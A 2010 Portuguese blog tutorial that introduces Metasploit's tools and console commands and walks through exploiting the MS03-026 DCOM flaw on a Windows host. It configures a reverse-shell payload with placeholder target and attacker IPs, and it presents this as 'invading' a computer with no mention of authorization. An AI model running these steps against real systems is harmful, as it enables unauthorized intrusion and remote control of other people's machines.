quarta-feira, 1 de dezembro de 2010

Metasploit Tutorial

Primeiramente, o Metasploit é um software que reune uma bilbioteca de exploits. Exploits, pra quem não sabe, é um programa ou um script que é capaz de explorar vulnerabilidades de determinados sistemas, redes, ou até mesmo de outros softwares, e modificá-los sem a intervenção de seu proprietário. Um exemplo de exploit é um script que invade uma rede por uma porta qualquer.

Dentro do Metasploit, encontramos diversas tools:

msfconsole - metasploit em modo console.
msfcli
- interface de automatização de penetração e exploração.
msflogdump
– exibe sessões de arquivos de log.
msfplayload
– usado para gerar payloads customizados.
msfpescan
– utilizado para analisar e descompilar executaveis e DLLs.
msfencode
– um codificador interativo de payload encoder.
msfupdate
– utilizado para verificar e fazer download de atualização do framework.
msfweb
- interface gráfica via navegador.

Vamos lá! Vamos executar o msfconsole…

No Linux, entramos na pasta do Metasploit, logamos como root e rodamos o comando ./msfconsole.
No Windows, é so abrir o atalho Metasploit Console.

Vamos à lista de comandos principais (os mais usados):

-Help: Exibe a lista com todos os comandos.

-Show: Serve para exibir e especificar cada item do framework. Quando digitamos show no console, ele retorna:
msfconsole: show: requires an option: ‘exploits’, ‘payloads’, ‘encoders’, or ‘nops’

-Use: Serve para ajustar o exploit que queremos usar. Usamos na sintaxe use /exemplo/exploit.

-Set: Serve para ajustar configurações do exploit. É usado após o uso do comando Use. É usado muito como Set RHOST para ajustar o host que o exploit atacará.

-Info: Exibe as informações e valores do exploit. É usado após o uso do comando Use.

-Exploit: É o comando usado para atacar. Depois de Use, Info e Set, quando o exploit está pronto pra ser usado, usamos o comando Exploit. E pronto!

Agora, vamos fazer um exemplo de ataque!

Primeiramente, para ver a lista de exploits, usamos o comando show exploits.

Vai aparecer uma lista de exploits, com o nome e uma breve explicação sobre cada um deles.

Suponhamos que queremos invadir um computador que roda o sistema operacional Windows, e está com a porta 135 aberta (porta do serviço RPC – Remote Procedure Call).

Vamos procurar o exploit para RPC na lista e, facilmente, achamos. O exploit é o exploit/windows/dcerpc/ms03_026_dcom.

Para usá-lo, vamos rodar o comando use exploit/windows/dcerpc/ms03_026_dcom.

Pronto! Agora vamos ter que configurar o PAYLOAD, o RHOST e o LHOST.

O payload é o codigo que irá ser executado quando o exploit fizer a invasão. Temos vários tipos de payloads. Desde os payloads que adicionam usuário, até payloads que dão a você, o controle remoto do computador!

Para ver a lista de payloads, digite show payloads. Agora, vamos escolher um payload. Escolhi o payload generic/shell_reverse_tcp, que me da uma shell remota do computador-alvo. Para definir esse payload, digitamos set payload generic/shell_reverse_tcp.

Agora, vamos definir o RHOST e o LHOST. RHOST é o RemoteHost, ou seja, o alvo. Em número de IP. Para definir, digite set RHOST 189.12.12.12 (o 189.12.12.12 é apenas exemplo, troque-o para o IP alvo). O LHOST é o LocalHost , ou seja , o seu IP. No caso, set LHOST 189.13.13.13 (o 189.13.13.13 é apenas exemplo, troque-o para o seu IP).

Pronto! Agora é so rodar o comando exploit e aproveitar

Download do Metasploit – http://www.metasploit.com/framework/download/

0 comentários:

Postar um comentário

 
Design by Eddy Oliveira